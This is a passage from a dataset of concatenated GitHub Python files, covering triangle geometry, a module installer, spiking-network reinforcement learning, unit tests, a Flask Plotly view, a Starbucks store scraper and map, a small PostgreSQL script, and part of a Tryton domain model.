| cloudant/bigcouch | couchjs/scons/scons-local-2.0.1/SCons/Tool/yacc.py | yacc.py | py | 3,371 | python | en | code | 570 | github-code | 90 |
14641021383 | #!/usr/bin/env python
# _*_ coding:utf-8 _*_
'''
随机生成1000个点,选取任意3个点组成三角形,问,如何判断其余的997个点在三角形内或外?
'''
import numpy as np
import random
# 定义点
class Vertex(object):
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return ("x坐标:%s,y坐标:%s" % (self.x, self.y))
# "Freind : %s" %self.name 返回多个参数啊
# 定义三角形
class Triangle(object):
def __init__(self, A, B, C):
self.A = A
self.B = B
self.C = C
def __str__(self):
return ("A点:%s B点:%s C点:%s" % (self.A, self.B, self.C))
# 判断构建的三角形是否满足三角形条件,即面积是否为零
def isTriangle(self):
arr = np.array([[self.A.x, self.A.y, 1], [self.B.x, self.B.y, 1], [self.C.x, self.C.y, 1]])
s = abs(0.5 * np.linalg.det(arr))
return False if s == 0 else True
# 判断一个点是否在三角形内,即该点与三角形任意两点构成的面积不为0且面积和为外部大三角形面积之和
def isInTriangle(self, D):
arr1 = np.array([[self.A.x, self.A.y, 1], [self.B.x, self.B.y, 1], [self.C.x, self.C.y, 1]])
sumAera = 0.5 * np.linalg.det(arr1)
arr2 = np.array([[self.A.x, self.A.y, 1], [self.B.x, self.B.y, 1], [D.x, D.y, 1]])
s1 = 0.5 * np.linalg.det(arr2)
arr3 = np.array([[self.A.x, self.A.y, 1], [D.x, D.y, 1], [self.C.x, self.C.y, 1]])
s2 = 0.5 * np.linalg.det(arr3)
arr4 = np.array([[D.x, D.y, 1], [self.B.x, self.B.y, 1], [self.C.x, self.C.y, 1]])
s3 = 0.5 * np.linalg.det(arr4)
if s1 != 0 and s2 != 0 and s3 != 0 and abs(s1 + s2 + s3 - sumAera) < 0.000001:
return True
else:
return False
if __name__ == '__main__':
    # Generate 1000 random points.
    arrOfVertex = []
    for i in range(1000):
        tempx = random.randint(1, 100)
        tempy = random.randint(1, 100)
        arrOfVertex.append(Vertex(tempx, tempy))
    # Pick three random points, retrying until they form a real triangle.
    k, j, m = random.randint(0, 999), random.randint(0, 999), random.randint(0, 999)
    selectedTriangle = Triangle(arrOfVertex[k], arrOfVertex[j], arrOfVertex[m])
    while not selectedTriangle.isTriangle():
        k, j, m = random.randint(0, 999), random.randint(0, 999), random.randint(0, 999)
        selectedTriangle = Triangle(arrOfVertex[k], arrOfVertex[j], arrOfVertex[m])
    # Classify every point.  FIX: the counter no longer shadows the
    # builtin `sum`; dead commented-out test code was dropped.
    arrOfJudge = []
    count_inside = 0
    for vertex in arrOfVertex:
        inside = selectedTriangle.isInTriangle(vertex)
        print(vertex, end=" ")
        if inside:
            count_inside += 1
        arrOfJudge.append(inside)
    print("选取的是否为三角形:%s" % selectedTriangle.isTriangle())
    print(arrOfJudge)
    # 1000 points -> count/10 is the percentage inside.
    print("在三角形内部的比例为:%s %%" % (count_inside / 10))
| ares5221/Data-Structures-and-Algorithms | 09概率组合数学/02RandomPos/判断点是否在三角形内部.py | 判断点是否在三角形内部.py | py | 3,172 | python | en | code | 1 | github-code | 90 |
9779190700 | #!/usr/bin/python
import zipfile
import io
import urllib.request
import json
import zipfile
import shutil
def getZipData(url):
    """Download *url* and return the raw response body as bytes.

    FIX: the original never closed the HTTP response; the context
    manager guarantees the connection is released.
    """
    with urllib.request.urlopen(url) as result:
        return result.read()
# Fetch the VirtoCommerce module catalog and unpack every "commerce"-group
# module (stable or preview version) into a folder named after its Id.
url = 'https://raw.githubusercontent.com/VirtoCommerce/vc-modules/master/modules_v3.json'
response = urllib.request.urlopen(url)
modules = json.load(response)
for module in modules:
    if module["Groups"]:
        # Case-insensitive group match.
        if 'commerce' in map(lambda x:x.lower(), module["Groups"]):
            moduleId = module["Id"]
            destinationPath = moduleId
            for version in module["Versions"]:
                # "" = released, "preview" = prerelease builds.
                if version["VersionTag"] in ["", "preview"]:
                    packageUrl = version["PackageUrl"]
                    zipData = getZipData(packageUrl)
                    zipRef = zipfile.ZipFile(io.BytesIO(zipData))
                    # NOTE(review): extractall() on a downloaded archive is
                    # vulnerable to zip-slip if the source is untrusted.
                    zipRef.extractall(destinationPath)
                    print(moduleId, 'installed')
| VirtoCommerce/vc-module-training-docker | src/VirtoCommerce.TrainingModule.Web/InstallLatestModules.py | InstallLatestModules.py | py | 935 | python | en | code | 5 | github-code | 90 |
29571909426 | # Parts of this code were adapted from the pytorch example at
# https://github.com/pytorch/examples/blob/master/reinforcement_learning/reinforce.py
# which is licensed under the license found in LICENSE.
import os
import random
# pytype: disable=import-error
import gym
import numpy as np
import torch
from absl import app
from absl import flags
from absl import logging
from norse.torch.functional.lif import LIFParameters
from norse.torch.module.encode import ConstantCurrentLIFEncoder
from norse.torch.module.leaky_integrator import LILinearCell
from norse.torch.module.lif import LIFRecurrentCell
from concurrent.futures import ThreadPoolExecutor
# pytype: enable=import-error
FLAGS = flags.FLAGS
# Command-line configuration for the REINFORCE cartpole experiment.
flags.DEFINE_enum("device", "cpu", ["cpu", "cuda"], "Device to use by pytorch.")
flags.DEFINE_integer("episodes", 1000, "Number of training trials.")
flags.DEFINE_float("learning_rate", 0.001, "Learning rate to use.")
flags.DEFINE_float("gamma", 0.99, "discount factor to use")
flags.DEFINE_integer("log_interval", 10, "In which intervals to display learning progress.")
flags.DEFINE_enum("model", "super", ["super"], "Model to use for training.")
flags.DEFINE_enum("policy", "snn", ["snn", "ann"], "Select policy to use.")
flags.DEFINE_boolean("render", False, "Render the environment")
flags.DEFINE_string("environment", "CartPole-v1", "Gym environment to use.")
flags.DEFINE_integer("random_seed", 9998, "Random seed to use")
class ANNPolicy(torch.nn.Module):
    """Two-layer fully-connected policy network for CartPole.

    Maps a state vector to a softmax distribution over actions.  The
    per-episode REINFORCE bookkeeping (``saved_log_probs``, ``rewards``)
    lives on the module so the update step can consume it after each
    rollout.
    """

    def __init__(self, *args, **kwargs):
        super(ANNPolicy, self).__init__()
        self.state_space = kwargs.pop("state_space")
        self.action_space = kwargs.pop("action_space")
        # Bias-free affine layers, 128 hidden units.
        self.l1 = torch.nn.Linear(self.state_space, 128, bias=False)
        self.l2 = torch.nn.Linear(128, self.action_space, bias=False)
        self.dropout = torch.nn.Dropout(p=0.6)
        # Filled in during rollouts, cleared by the training step.
        self.saved_log_probs = []
        self.rewards = []

    def forward(self, x):
        hidden = torch.nn.functional.relu(self.dropout(self.l1(x)))
        return torch.nn.functional.softmax(self.l2(hidden), dim=1)
class SNNPolicy(torch.nn.Module):
    """
    SNN policy: encodes the state as constant-current LIF spike trains,
    integrates them through a recurrent LIF layer, and reads out action
    scores via a leaky-integrator layer whose max-over-time membrane
    voltage is softmaxed into action probabilities.
    """
    def __init__(self, *args, **kwargs):
        super(SNNPolicy, self).__init__()
        self.state_dim = kwargs.pop('state_space')
        # NOTE(review): input_features appears unused — the LIF layer is
        # sized from 2 * state_dim instead; confirm it can be removed.
        self.input_features = 16
        self.hidden_features = 128
        self.output_features = kwargs.pop('action_space')
        # 40 timesteps of constant-current encoding per observation.
        self.constant_current_encoder = ConstantCurrentLIFEncoder(40)
        # 2 * state_dim inputs: positive and negative state components
        # are encoded as separate channels (see forward()).
        self.lif = LIFRecurrentCell(2 * self.state_dim, self.hidden_features, p=LIFParameters(method="super", alpha=100.0))
        self.dropout = torch.nn.Dropout(p=0.5)
        self.readout = LILinearCell(self.hidden_features, self.output_features)
        # Per-episode REINFORCE bookkeeping.
        self.saved_log_probs = []
        self.rewards = []
    def forward(self, x):
        # Split the signed state into rectified positive/negative halves,
        # scaled up so the encoder produces enough spikes.
        scale = 50
        x_pos = self.constant_current_encoder(torch.nn.functional.relu(scale * x))
        x_neg = self.constant_current_encoder(torch.nn.functional.relu(-scale * x))
        x = torch.cat([x_pos, x_neg], dim=2)
        seq_length, batch_size, _ = x.shape
        voltages = torch.zeros(
            seq_length, batch_size, self.output_features, device=x.device
        )
        s1 = so = None
        # sequential integration loop
        for ts in range(seq_length):
            z1, s1 = self.lif(x[ts, :, :], s1)
            z1 = self.dropout(z1)
            vo, so = self.readout(z1, so)
            voltages[ts, :, :] = vo
        # tmp_fn = lambda in_1: lambda in_2: lambda in_3: self.parallel_integration_worker(in_1, in_2, in_3)
        # with ThreadPoolExecutor(max_workers=4) as executor:
        #     tmp_fn = tmp_fn(x)
        #     tmp_fn = tmp_fn(voltages)
        #     executor.map(tmp_fn, range(seq_length))
        # Max membrane voltage over time is the action score.
        m, _ = torch.max(voltages, 0)
        p_y = torch.nn.functional.softmax(m, dim=1)
        return p_y
    def parallel_integration_worker(self, x, voltages, ts):
        # NOTE(review): only referenced from the commented-out ThreadPool
        # experiment above, and it resets s1/so on every call, discarding
        # the recurrent state — not equivalent to the sequential loop.
        s1 = so = None
        z1, s1 = self.lif(x[ts, :, :], s1)
        z1 = self.dropout(z1)
        vo, so = self.readout(z1, so)
        voltages[ts, :, :] = vo
        return None
def select_action(state, policy, device):
    """Sample an action from the policy for a single observation.

    Appends the sampled action's log-probability to
    ``policy.saved_log_probs`` for the REINFORCE update, and returns
    ``(action_index, probs)``.
    """
    obs = torch.from_numpy(state).float().unsqueeze(0).to(device)
    probs = policy(obs)
    dist = torch.distributions.Categorical(probs)
    choice = dist.sample()
    policy.saved_log_probs.append(dist.log_prob(choice))
    return choice.item(), probs
def finish_episode(policy, optimizer):
    """Run one REINFORCE update from the episode stored on ``policy``.

    Computes discounted returns (discount FLAGS.gamma), normalizes them,
    forms the policy-gradient loss from the saved log-probabilities,
    steps the optimizer, clears the episode buffers, and returns the
    scalar loss tensor.
    """
    eps = np.finfo(np.float32).eps.item()
    # Discounted returns, computed back-to-front.
    discounted = []
    running = 0
    for reward in reversed(policy.rewards):
        running = reward + FLAGS.gamma * running
        discounted.append(running)
    discounted.reverse()
    returns = torch.as_tensor(discounted)
    # Normalize for variance reduction; eps guards a zero std.
    returns = (returns - returns.mean()) / (returns.std() + eps)
    losses = [-log_p * ret for log_p, ret in zip(policy.saved_log_probs, returns)]
    optimizer.zero_grad()
    policy_loss = torch.cat(losses).sum()
    policy_loss.backward()
    optimizer.step()
    # Reset the episode buffers for the next rollout.
    del policy.rewards[:]
    del policy.saved_log_probs[:]
    return policy_loss
def main(args):
    """Train a REINFORCE agent on FLAGS.environment with the policy chosen
    by FLAGS.policy ('ann' or 'snn'), then persist reward/loss curves and
    the model/optimizer state under runs/<environment>/<label>/.
    """
    t = 0
    running_reward = 10
    # Seed every RNG source for reproducibility.
    torch.manual_seed(FLAGS.random_seed)
    random.seed(FLAGS.random_seed)
    label = f"{FLAGS.policy}-{FLAGS.model}-{FLAGS.random_seed}"
    os.makedirs(f"runs/{FLAGS.environment}/{label}", exist_ok=True)
    os.chdir(f"runs/{FLAGS.environment}/{label}")
    FLAGS.append_flags_into_file("flags.txt")
    np.random.seed(FLAGS.random_seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed(FLAGS.random_seed)
    device = torch.device(FLAGS.device)
    env = gym.make(FLAGS.environment)
    env.reset()
    env.seed(FLAGS.random_seed)
    env_state_space = env.observation_space.shape[0]
    env_action_space = env.action_space.n
    if FLAGS.policy == "ann":
        policy = ANNPolicy(
            state_space=env_state_space, action_space=env_action_space
        ).to(device)
    elif FLAGS.policy == "snn":
        policy = SNNPolicy(
            state_space=env_state_space, action_space=env_action_space
        ).to(device)
    else:
        raise NotImplementedError
    optimizer = torch.optim.Adam(policy.parameters(), lr=FLAGS.learning_rate)
    running_rewards = []
    episode_rewards = []
    episode_losses = []
    for e in range(FLAGS.episodes):
        state, ep_reward = env.reset(), 0
        time_steps_max = env._max_episode_steps  # Default was 10000
        for t in range(1, time_steps_max):  # Don't infinite loop while learning
            action, _ = select_action(state, policy, device=device)
            state, reward, done, _ = env.step(action)
            if FLAGS.render:
                env.render()
            policy.rewards.append(reward)
            ep_reward += reward
            if done:
                break
        # Exponential moving average of the episode reward.
        running_reward = 0.05 * ep_reward + (1 - 0.05) * running_reward
        episode_loss = finish_episode(policy, optimizer)
        if e % FLAGS.log_interval == 0:
            logging.info(
                "Episode {}/{} \tLast reward: {:.2f}\tAverage reward: {:.2f}\tLoss: {:.2f}".format(
                    e, FLAGS.episodes, ep_reward, running_reward, episode_loss
                )
            )
        episode_rewards.append(ep_reward)
        running_rewards.append(running_reward)
        # Store a plain float: finish_episode returns a tensor that still
        # requires grad, which np.array() below would otherwise reject.
        episode_losses.append(float(episode_loss))
    np.save("running_rewards.npy", np.array(running_rewards))
    np.save("episode_rewards.npy", np.array(episode_rewards))
    # BUG FIX: episode_rewards was previously saved under episode_losses.npy.
    np.save("episode_losses.npy", np.array(episode_losses))
    torch.save(optimizer.state_dict(), "optimizer.pt")
    torch.save(policy.state_dict(), "policy.pt")
# Entry point: absl's app.run parses command-line FLAGS, then calls main().
if __name__ == "__main__":
    app.run(main)
| Surya-77/rl-snn-norse | reinforce.py | reinforce.py | py | 8,395 | python | en | code | 0 | github-code | 90 |
5011453605 | import os
from datetime import datetime
from unittest.mock import MagicMock
from unittest.mock import PropertyMock
from unittest.mock import patch
import cauldron as cd
from cauldron.session import exposed
from cauldron.test import support
from cauldron.test.support import scaffolds
ROOT = 'cauldron.session.exposed'
class TestExposed(scaffolds.ResultsTest):
    """Test suite for the exposed module"""
    # Property pass-through tests: ExposedProject / ExposedStep should mirror
    # their internal objects and degrade gracefully when those are absent.
    def test_no_project_defaults(self):
        """Expected defaults when no project exists"""
        ep = exposed.ExposedProject()
        self.assertIsNone(ep.display)
        self.assertIsNone(ep.shared)
        self.assertIsNone(ep.settings)
        self.assertIsNone(ep.title)
        self.assertIsNone(ep.id)
        self.assertIsNone(ep.path())
        with self.assertRaises(RuntimeError):
            ep.title = 'Some Title'
    @patch('{}.ExposedStep._step'.format(ROOT), new_callable=PropertyMock)
    def test_step_properties(self, _step: PropertyMock):
        """Should return values from the internal _step object."""
        now = datetime.utcnow()
        _step.return_value = MagicMock(
            start_time=now,
            end_time=now,
            elapsed_time=0,
            is_visible=True
        )
        es = exposed.ExposedStep()
        self.assertEqual(now, es.start_time)
        self.assertEqual(now, es.end_time)
        self.assertEqual(0, es.elapsed_time)
    @patch('{}.ExposedStep._step'.format(ROOT), new_callable=PropertyMock)
    def test_step_visibility(self, _step: PropertyMock):
        """Should return values from the internal _step object."""
        _step.return_value = MagicMock(is_visible=True)
        es = exposed.ExposedStep()
        self.assertTrue(es.visible)
        es.visible = False
        self.assertFalse(es.visible)
    @patch('{}.ExposedStep._step'.format(ROOT), new_callable=PropertyMock)
    def test_step_stop_aborted(self, _step: PropertyMock):
        """
        Should abort stopping and not raise an error when no internal step
        is available to stop.
        """
        _step.return_value = None
        es = exposed.ExposedStep()
        es.stop()
    @patch('cauldron.session.exposed.ExposedProject.get_internal_project')
    def test_project_stop_aborted(self, get_internal_project: MagicMock):
        """
        Should abort stopping and not raise an error when no internal project
        is available to stop.
        """
        get_internal_project.return_value = None
        ep = exposed.ExposedProject()
        ep.stop()
    def test_change_title(self):
        """Title should change through exposed project."""
        test_title = 'Some Title'
        support.create_project(self, 'igor')
        cd.project.title = test_title
        self.assertEqual(cd.project.title, test_title)
    def test_no_step_defaults(self):
        """Exposed step should apply defaults without project."""
        es = exposed.ExposedStep()
        self.assertIsNone(es._step)
    # Stop-behavior tests: each one builds a small project whose step source
    # sets cd.shared markers, then inspects which markers actually ran and
    # whether the cd-StepStop element was rendered.
    def test_stop_step_and_halt(self):
        """
        Should stop the step early and not continue running future steps
        """
        support.create_project(self, 'homer')
        support.add_step(self, contents='\n'.join([
            'import cauldron as cd',
            'cd.shared.test = 0',
            'cd.step.breathe()',
            'cd.shared.test = 1',
            'cd.step.stop(halt=True)',
            'cd.shared.test = 2'
        ]))
        support.add_step(self, contents='\n'.join([
            'import cauldron as cd',
            'cd.shared.test = 3'
        ]))
        support.run_command('run')
        project = cd.project.get_internal_project()
        step = project.steps[1]
        self.assertEqual(project.shared.fetch('test'), 1)
        self.assertNotEqual(-1, step.dom.find('cd-StepStop'))
    def test_stop_project(self):
        """
        Should stop the step early and not continue running future steps
        because the project was halted.
        """
        support.create_project(self, 'homer3')
        support.add_step(self, contents='\n'.join([
            'import cauldron as cd',
            'cd.shared.test = 0',
            'cd.step.breathe()',
            'cd.shared.test = 1',
            'cd.project.stop()',
            'cd.shared.test = 2'
        ]))
        support.add_step(self, contents='\n'.join([
            'import cauldron as cd',
            'cd.shared.test = 3'
        ]))
        support.run_command('run')
        project = cd.project.get_internal_project()
        step = project.steps[1]
        self.assertEqual(project.shared.fetch('test'), 1)
        self.assertNotEqual(-1, step.dom.find('cd-StepStop'))
    def test_stop_step_no_halt(self):
        """
        Should stop the step early but continue running future steps
        """
        support.create_project(self, 'homer2')
        support.add_step(self, contents='\n'.join([
            'import cauldron as cd',
            'cd.shared.test = 0',
            'cd.shared.other = 0',
            'cd.step.breathe()',
            'cd.shared.test = 1',
            'cd.step.stop()',
            'cd.shared.test = 2'
        ]))
        support.add_step(self, contents='\n'.join([
            'import cauldron as cd',
            'cd.shared.other = 1'
        ]))
        support.run_command('run')
        project = cd.project.get_internal_project()
        step = project.steps[1]
        self.assertEqual(project.shared.fetch('test'), 1)
        self.assertEqual(project.shared.fetch('other'), 1)
        self.assertNotEqual(-1, step.dom.find('cd-StepStop'))
    def test_stop_step_silent(self):
        """Should stop the step early and silently"""
        contents = '\n'.join([
            'import cauldron as cd',
            'cd.shared.test = 0',
            'cd.step.breathe()',
            'cd.shared.test = 1',
            'cd.step.stop(silent=True)',
            'cd.shared.test = 2'
        ])
        support.create_project(self, 'homeritis')
        support.add_step(self, contents=contents)
        support.run_command('run')
        project = cd.project.get_internal_project()
        step = project.steps[0]
        self.assertEqual(project.shared.fetch('test'), 1)
        self.assertEqual(-1, step.dom.find('cd-StepStop'))
    @patch(
        'cauldron.session.exposed.ExposedProject.internal_project',
        new_callable=PropertyMock
    )
    @patch('time.sleep')
    def test_get_internal_project(
            self,
            sleep: MagicMock,
            internal_project: PropertyMock
    ):
        """
        Should get internal project on the third attempt after one
        attempt to check before entering the retry and sleep loop
        and then two iterations through the loop before encountering
        a non-None value.
        """
        project = exposed.ExposedProject()
        internal_project.side_effect = [None, None, None, 'test']
        result = project.get_internal_project()
        self.assertEqual('test', result)
        self.assertEqual(2, sleep.call_count)
    @patch(
        'cauldron.session.exposed.ExposedProject.internal_project',
        new_callable=PropertyMock
    )
    @patch('time.time')
    @patch('time.sleep')
    def test_get_internal_project_fail(
            self,
            sleep: MagicMock,
            time_time: MagicMock,
            internal_project: PropertyMock
    ):
        """
        Should fail to get internal project and return None after
        eventually timing out.
        """
        project = exposed.ExposedProject()
        time_time.side_effect = range(20)
        internal_project.return_value = None
        result = project.get_internal_project()
        self.assertIsNone(result)
        self.assertEqual(10, sleep.call_count)
    @patch(
        'cauldron.session.exposed.ExposedStep._step',
        new_callable=PropertyMock
    )
    def test_write_to_console(self, _step: PropertyMock):
        """
        Should write to the console using a write_source function
        call on the internal step report's stdout_interceptor.
        """
        # Covers several message types; each should be stringified via format.
        trials = [2, True, None, 'This is a test', b'hello']
        for message in trials:
            _step_mock = MagicMock()
            write_source = MagicMock()
            _step_mock.report.stdout_interceptor.write_source = write_source
            _step.return_value = _step_mock
            step = exposed.ExposedStep()
            step.write_to_console(message)
            args, kwargs = write_source.call_args
            self.assertEqual('{}'.format(message), args[0])
    @patch(
        'cauldron.session.exposed.ExposedStep._step',
        new_callable=PropertyMock
    )
    def test_render_to_console(self, _step: PropertyMock):
        """
        Should render to the console using a write_source function
        call on the internal step report's stdout_interceptor.
        """
        message = '{{ a }} is not {{ b }}.'
        _step_mock = MagicMock()
        write_source = MagicMock()
        _step_mock.report.stdout_interceptor.write_source = write_source
        _step.return_value = _step_mock
        step = exposed.ExposedStep()
        step.render_to_console(message, a=7, b='happy')
        args, kwargs = write_source.call_args
        self.assertEqual('7 is not happy.', args[0])
    @patch(
        'cauldron.session.exposed.ExposedStep._step',
        new_callable=PropertyMock
    )
    def test_write_to_console_fail(self, _step: PropertyMock):
        """
        Should raise a ValueError when there is no current step to operate
        upon by the write function call.
        """
        _step.return_value = None
        step = exposed.ExposedStep()
        with self.assertRaises(ValueError):
            step.write_to_console('hello')
    @patch('cauldron.render.stack.get_formatted_stack_frame')
    def test_render_stop_display(self, get_formatted_stack_frame: MagicMock):
        """Should render stop display without error"""
        get_formatted_stack_frame.return_value = [
            {'filename': 'foo'},
            {'filename': 'bar'},
            {'filename': os.path.realpath(exposed.__file__)}
        ]
        step = MagicMock()
        exposed.render_stop_display(step, 'FAKE')
        self.assertEqual(1, step.report.append_body.call_count)
    @patch('cauldron.templating.render_template')
    @patch('cauldron.render.stack.get_formatted_stack_frame')
    def test_render_stop_display_error(
            self,
            get_formatted_stack_frame: MagicMock,
            render_template: MagicMock
    ):
        """
        Should render an empty stack frame when the stack data is invalid.
        """
        get_formatted_stack_frame.return_value = None
        step = MagicMock()
        exposed.render_stop_display(step, 'FAKE')
        self.assertEqual({}, render_template.call_args[1]['frame'])
    def test_project_path(self):
        """Should create an absolute path within the project."""
        ep = exposed.ExposedProject()
        project = MagicMock()
        project.source_directory = os.path.realpath(os.path.dirname(__file__))
        ep.load(project)
        result = ep.path('hello.md')
        self.assertTrue(result.endswith('{}hello.md'.format(os.sep)))
| sernst/cauldron | cauldron/test/projects/test_exposed.py | test_exposed.py | py | 11,244 | python | en | code | 78 | github-code | 90 |
4483613818 | from flask import render_template
from . import main
import plotly
import plotly.graph_objs as go
import json
def create_plot():
    """Build two demo line+marker traces and serialize them to a JSON string
    suitable for embedding in a Plotly.js page.
    """
    player_one = go.Scatter(
        x=(1, 2, 3),
        y=(1, 2, 3),
        mode='lines+markers',
        name='Player_1')
    player_two = go.Scatter(
        x=(1, 2, 3),
        y=(2, 3, 4),
        mode='lines+markers',
        name='Player_2')
    traces = [player_one, player_two]
    return json.dumps(traces, cls=plotly.utils.PlotlyJSONEncoder)
@main.route('/')
def index():
    """Render the landing page with the demo plot embedded."""
    plot_json = create_plot()
    return render_template('index.html', plot=plot_json)
| rbekeris/databakery | Dash_app_0_1/Webapp/Bakerapp/main/views.py | views.py | py | 746 | python | en | code | 0 | github-code | 90 |
18989244981 | import psycopg2
from base64 import encode
from numpy import disp
# Classify a vehicle by model year and mileage, print the category, and log
# the result into the tareapreparatoria1 table.
try:
    conexion = psycopg2.connect(
        host = "localhost",
        port = "5432",
        user = "postgres",
        # SECURITY: hard-coded database credentials; move to environment
        # variables or a config file outside version control.
        password = "2807289050109",
        dbname = "postgres"
    )
    print("Conexión exitosa")
except psycopg2.Error as e:
    print("Ocurrió un error en la conexión")
    print("Verifique los parámetros")

cursor = conexion.cursor()
numero1 = int(input('modelo: '))
numero2 = int(input('Kilometraje: '))
# Decide the category once, then print and insert it through a single shared
# code path (the original duplicated the insert/commit in every branch).
# NOTE(review): the first branch's mileage threshold (20) is inconsistent
# with the others (20000 / 10000) — confirm the intended value.
if numero1 < 2007 and numero2 > 20:
    total = 'Renovar'
# BUG FIX: the original tested (numero2 <= 2013) and (numero2 >= 20000),
# which is unsatisfiable, so this branch could never run; the year bound
# belongs on numero1 (the model year).
elif 2007 <= numero1 <= 2013 and numero2 >= 20000:
    total = 'Mantenimiento'
elif numero1 > 2013 and numero2 < 10000:
    total = 'Optimas condiciones'
else:
    total = 'Mecanico'
# numpy.disp was deprecated and removed in NumPy 2.0; print is equivalent.
print(total)
cursor.execute("insert into tareapreparatoria1(ejercicio, total) values(%s, %s);",('Ejercicio 14', total))
conexion.commit()
cursor.close()
conexion.close()
encode | kiwiii22/tareaprep1 | P14.py | P14.py | py | 1,493 | python | es | code | 0 | github-code | 90 |
5219369166 | # -*-coding:utf-8 -*-
import requests
import json
import folium
#pip install folium
def getSido():
    """Fetch the Starbucks Korea sido (province) list.

    Returns:
        Dict mapping sido code -> sido name.
    """
    url = 'https://www.starbucks.co.kr/store/getSidoList.do'
    entries = requests.post(url).json()['list']
    return {entry['sido_cd']: entry['sido_nm'] for entry in entries}
def getGuGun(sido_code):
    """Fetch the gugun (district) list for one sido.

    Returns:
        Dict mapping gugun code -> gugun name.
    """
    url = 'https://www.starbucks.co.kr/store/getGugunList.do'
    entries = requests.post(url, data={'sido_cd': sido_code}).json()['list']
    return {entry['gugun_cd']: entry['gugun_nm'] for entry in entries}
def getStore(sido_code='', gugun_code=''):
    """Fetch stores for the given sido or gugun code.

    The ins_lat/ins_lng values mimic the browser's reference coordinates for
    the store-locator request.

    Returns:
        List of dicts with keys s_name, dro_address, tel, lat, lot.
    """
    url = 'https://www.starbucks.co.kr/store/getStore.do'
    payload = {
        'ins_lat': '37.4865643',
        'ins_lng': '127.0206673',
        'p_sido_cd': sido_code,
        'p_gugun_cd': gugun_code,
        'in_biz_cd': '',
        'set_date': '',
    }
    resp = requests.post(url, data=payload)
    stores = []
    for entry in resp.json()['list']:
        stores.append({
            's_name': entry['s_name'],
            # Key name kept as-is ('dro_address') for downstream compatibility.
            'dro_address': entry['doro_address'],
            'tel': entry['tel'],
            'lat': entry['lat'],
            'lot': entry['lot'],
        })
    return stores
def make_map(result):
    """Render the stores in result['store_list'] as red markers on a folium
    map centered on the stores' bounding box, saved to result.html.

    Each store dict must provide 's_name', 'lat' and 'lot' (string coords).
    """
    # Coordinates arrive as strings; convert to float before comparing so
    # min/max are numeric, not lexicographic.
    lats = [float(store['lat']) for store in result['store_list']]
    lots = [float(store['lot']) for store in result['store_list']]
    # BUG FIX: min_lot was computed with max(), which made the longitude span
    # zero and centered the map on the easternmost store.
    min_lat, max_lat = min(lats), max(lats)
    min_lot, max_lot = min(lots), max(lots)
    # Midpoint of the bounding box.
    center_lat = max_lat - (max_lat - min_lat) / 2
    center_lot = max_lot - (max_lot - min_lot) / 2
    # zoom_start is the initial zoom level (18 is the maximum).
    m = folium.Map(location=[center_lat, center_lot], zoom_start=14)
    for data in result['store_list']:
        # Popup shown when the marker is clicked; width scales with the name.
        popup = folium.Popup(folium.Html(data['s_name']), max_width=len(data['s_name'])*30)
        folium.Marker(
            location=[data['lat'], data['lot']],
            popup=popup,
            icon=folium.Icon(color='red')
        ).add_to(m)
    m.save('result.html')  # Write the rendered map to result.html.
if __name__ == '__main__':
    '''
    print(getSido())
    sido = input('도시 코드를 입력해 주세요 : ')
    if sido == '17':
        print(getStore(sido_code=sido))
    else:
        print(getGuGun(sido))
        gugun = input('구군 코드를 입력해 주세요 :')
        print(getStore(gugun_code=gugun))
    '''
    korea_starbucks = list()
    # 1. Fetch every nationwide sido code via getSido.
    sido_all = getSido()
    # 2. For each sido code from step 1, look up its gugun codes via getGuGun.
    # 2-1. Exception: sido code '17' (Sejong City) has no gugun level, so it
    #      is passed straight to getStore as a sido code.
    for sido in sido_all:
        if sido == '17':
            result = getStore(sido_code= sido)
            #print(result)
            korea_starbucks.extend(result) # concatenate
        else:
            gugun_all = getGuGun(sido)
            for gugun in gugun_all:
                result = getStore(gugun_code= gugun)
                #print(result)
                korea_starbucks.extend(result)
    # 3. The lists returned by getStore are merged via korea_starbucks.extend.
    # 4. Save korea_starbucks as JSON shaped like {'list': [{}, {}, ... ]}.
    starbucks_dict = dict()
    starbucks_dict['list'] = korea_starbucks
    result = json.dumps(starbucks_dict, ensure_ascii=False)
    with open('starbucks.json', 'w', encoding='utf-8') as f:
        f.write(result)
39849008693 | from trytond.model import ModelView, ModelSQL, fields
from trytond.transaction import Transaction
from trytond.pool import Pool
from trytond.pyson import If, Eval, Bool
import datetime
__all__ = ['Domain', 'Renewal', 'DomainProduct']
# Tryton model for a registered internet domain and its renewal history.
# NOTE: the one-line class docstring below is used by Tryton as the model's
# display name — do not reword it.
class Domain(ModelSQL, ModelView):
    'Domain'
    __name__ = 'internetdomain.domain'
    # Company owning the record; the domain clause restricts it to the
    # company in the current transaction context when one is set.
    company = fields.Many2One('company.company', 'Company', required=True,
        domain=[
            ('id', If(Eval('context', {}).contains('company'), '=', '!='),
                Eval('context', {}).get('company', 0)),
            ])
    name = fields.Char('Name', required=True)
    date_create = fields.Date('Date Create',
        required=True)
    # Computed from the most recent renewal (see get_expire/search_expire).
    date_expire = fields.Function(fields.Date('Date expired'),
        'get_expire', searcher='search_expire')
    # True when the domain is close to (or past) expiration (see get_warning).
    warning = fields.Function(fields.Boolean('Warning expired'),
        'get_warning')
    party = fields.Many2One('party.party', 'Party', required=True)
    # Address restricted to the selected party.
    party_address = fields.Many2One('party.address', 'Address',
        required=True, depends=['party'],
        domain=[('party', '=', Eval('party'))])
    # Registrator of the latest renewal (computed).
    registrator = fields.Function(fields.Many2One('party.party', 'Registrator'),
        'get_registrator')
    registrator_website = fields.Function( fields.Char('Website'),
        'get_registrator_website')
    dns1 = fields.Char('DNS Primary')
    dns2 = fields.Char('DNS Secundary')
    dns3 = fields.Char('DNS Secundary (2)')
    dns4 = fields.Char('DNS Secundary (3)')
    ip = fields.Char('IP')
    comment = fields.Text('Comment')
    active = fields.Boolean('Active')
    # Renewals ordered newest-first so renewal[0]-style access sees the latest.
    renewal = fields.One2Many('internetdomain.renewal', 'domain', 'Renewals',
        order=[('date_renewal', 'DESC')])
    products = fields.Many2Many('internetdomain.domain-domain.product',
        'domain', 'product', 'Products')
    @staticmethod
    def default_active():
        return True
    @staticmethod
    def default_company():
        # Default to the company from the transaction context, if any.
        return Transaction().context.get('company')
    @classmethod
    def view_attributes(cls):
        # Paint tree rows red when the domain is near/past expiration.
        return [('/tree', 'colors',
                If(Bool(Eval('warning')), 'red', 'black'))]
    def get_last_renewal(self):
        """Get last renewal from domain"""
        # Returns the newest Renewal record, or False when none exists.
        renewal = False
        Renewal = Pool().get('internetdomain.renewal')
        renewals = Renewal.search(
            [('domain', '=', self.id)],
